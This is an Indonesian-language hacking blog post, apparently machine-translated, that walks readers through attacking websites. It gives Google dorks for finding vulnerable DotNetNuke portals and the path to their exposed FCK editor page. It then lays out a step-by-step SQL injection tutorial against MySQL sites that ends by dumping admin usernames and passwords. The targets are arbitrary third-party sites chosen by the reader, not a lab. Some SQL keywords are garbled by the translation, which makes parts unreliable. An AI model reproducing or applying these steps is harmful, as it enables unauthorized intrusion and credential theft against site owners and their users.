.jpg)
Salah satu metode hacking yang lebih disebut "Portal Hacking (DNN)". Metode ini juga menggunakan di google mesin pencari untuk menemukan situs hackable .. Di sini U dapat menggunakan hanya Google Dorks untuk
hacking website ..
Di sini U dapat menggunakan dez dua Google Dorks
1- inurl: "/ portal / 0"
2- inurl: /tabid/36/language/en-US/Default.aspx
Anda juga dapat memodifikasi google dork ini sesuai dengan kebutuhan Anda & persyaratan
Berikut adalah mengeksploitasi
Penyedia / HtmlEditorProviders / FCK / fcklinkgallery.aspx
Langkah 1:
http://www.google.com
Langkah 2:
Sekarang masukkan dork ini
: inurl: /tabid/36/language/en-US/Default.aspx
ini adalah dork untuk menemukan situs Rentan Portal, gunakan dengan bijak.
Langkah 3:
Anda akan menemukan banyak situs, Pilih situs yang Anda merasa nyaman dengan.
Langkah 4:
Misalnya mengambil situs ini.
http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx
Langkah 5: Sekarang ganti
/Home/tabid/36/Language/en-US/Default.aspx
dengan ini
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
=======================================================================
SQL Injection di MySQL Database: -
Serangan SQL Injection adalah suntikan kode yang mengeksploitasi lapisan database aplikasi. Ini adalah paling sering database MySQL, tapi ada teknik untuk melakukan serangan ini dalam database lain seperti Oracle. Dalam tutorial ini saya akan menunjukkan langkah-langkah untuk melakukan serangan pada database MySQL.
Langkah 1:
Ketika pengujian website untuk kerentanan SQL Injection, Anda perlu menemukan halaman yang terlihat seperti ini:
www.site.com/page=1
atau
www.site.com/id=5
Pada dasarnya situs perlu memiliki = maka nomor atau string, tetapi paling sering nomor. Setelah Anda telah menemukan halaman seperti ini, kami menguji kerentanan hanya dengan memasukkan sebuah 'setelah nomor di url. Sebagai contoh:
www.site.com/page=1 '
Jika database rentan, halaman akan meludahkan kesalahan MySQL seperti;
Peringatan: mysql_num_rows (): argumen yang diberikan bukan merupakan hasil resource MySQL yang valid di /home/wwwprof/public_html/readnews.php on line 29
Jika beban halaman seperti biasa maka database tidak rentan, dan website ini tidak rentan terhadap SQL Injection.
Langkah 2
Sekarang kita perlu menemukan jumlah kolom serikat dalam database. Kami melakukan ini dengan menggunakan "order by" perintah. Kami melakukan ini dengan memasukkan "order by 1--", "order by 2--" dan seterusnya sampai kita menerima kesalahan halaman. Sebagai contoh:
Agar www.site.com/page=1 oleh 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--
Jika kita menerima kesalahan MySQL lain di sini, maka itu berarti kita memiliki 4 kolom. Jika situs errored pada "order by 9" maka kita akan memiliki 8 kolom. Jika ini tidak berhasil, bukan - setelah nomor, mengubahnya dengan / *, karena mereka adalah dua prefiks perbedaan dan jika salah satu bekerja yang lain cenderung tidak terlalu. Ini tergantung pada cara database dikonfigurasi untuk yang awalan digunakan.
Langkah 3
Kita sekarang akan menggunakan "serikat" perintah untuk menemukan kolom rentan. Jadi kita masuk setelah url, serikat semua pilih (jumlah kolom) -,
sebagai contoh:
serikat www.site.com/page=1 semua pilih 1,2,3,4--
Ini adalah apa yang akan kita masukkan jika kita memiliki 4 kolom. Jika Anda memiliki 7 kolom yang akan menempatkan, serikat semua pilih 1,2,3,4,5,6,7-- Jika hal ini dilakukan berhasil halaman harus menunjukkan beberapa nomor di suatu tempat pada halaman. Sebagai contoh, 2 dan 3. Ini berarti kolom 2 dan 3 rentan.
Langkah 4
Kita sekarang perlu untuk menemukan versi database, nama dan pengguna. Kami melakukan hal ini dengan mengganti nomor kolom rentan dengan perintah berikut:
user ()
database ()
Versi ()
atau jika ini tidak bekerja mencoba ...
@@Pengguna
@@Version
@@Database
Misalnya url akan terlihat seperti:
serikat www.site.com/page=1 semua pilih 1, pengguna (), versi (), 4--
Halaman yang dihasilkan kemudian akan menunjukkan pengguna database dan kemudian versi MySQL. Misalnya admin @ localhost dan MySQL 5.0.83.
PENTING: Jika versi adalah 5 dan di atas baca terus untuk melakukan serangan, jika 4 dan di bawah, Anda harus memaksa hewan atau menebak nama tabel dan kolom, program dapat digunakan untuk melakukan hal ini.
Langkah 5
Dalam langkah ini tujuan kami adalah untuk membuat daftar semua nama tabel dalam database. Untuk melakukan hal ini kita masukkan perintah berikut setelah url.
UNION SELECT 1, table_name, 3,4 DARI information_schema.tables--
Jadi url akan terlihat seperti:
www.site.com/page=1 UNION SELECT 1, table_name, 3,4 DARI information_schema.tables--
Ingat "table_name" masuk dalam kolom nomor rentan Anda temukan sebelumnya. Jika perintah ini dimasukkan dengan benar, halaman harus menunjukkan semua tabel dalam database, sehingga mencari tabel yang berisi informasi yang berguna seperti password, sehingga mencari tabel admin atau tabel anggota atau pengguna.
Langkah 6
Pada Langkah ini kita ingin daftar semua nama kolom dalam database, untuk melakukan hal ini kita gunakan perintah berikut:
serikat semua pilih 1,2, group_concat (column_name), 4 dari information_schema.columns mana TABLE_SCHEMA = database () -
Jadi url akan terlihat seperti ini:
serikat www.site.com/page=1 semua pilih 1,2, group_concat (column_name), 4 dari information_schema.columns mana TABLE_SCHEMA = database () -
Perintah ini membuat halaman meludahkan semua nama kolom dalam database. Jadi sekali lagi, mencari nama-nama yang menarik seperti user, email dan password.
Langkah 7
Akhirnya kita perlu membuang data, sehingga mengatakan kami ingin mendapatkan "username" dan bidang "password", dari tabel "admin" kita akan menggunakan perintah berikut,
serikat semua pilih 1,2, group_concat (username, 0x3a, password), 4 dari admin--
Jadi url akan terlihat seperti ini:
www.site.com/page=1 serikat semua pilih 1,2, group_concat (username, 0x3a, password), 4 dari admin--
Di sini "concat" perintah sesuai username dengan password sehingga Anda tidak perlu menebak, jika perintah ini berhasil maka Anda harus disajikan dengan halaman penuh username dan password dari website
T.I Sniper
0 Comments
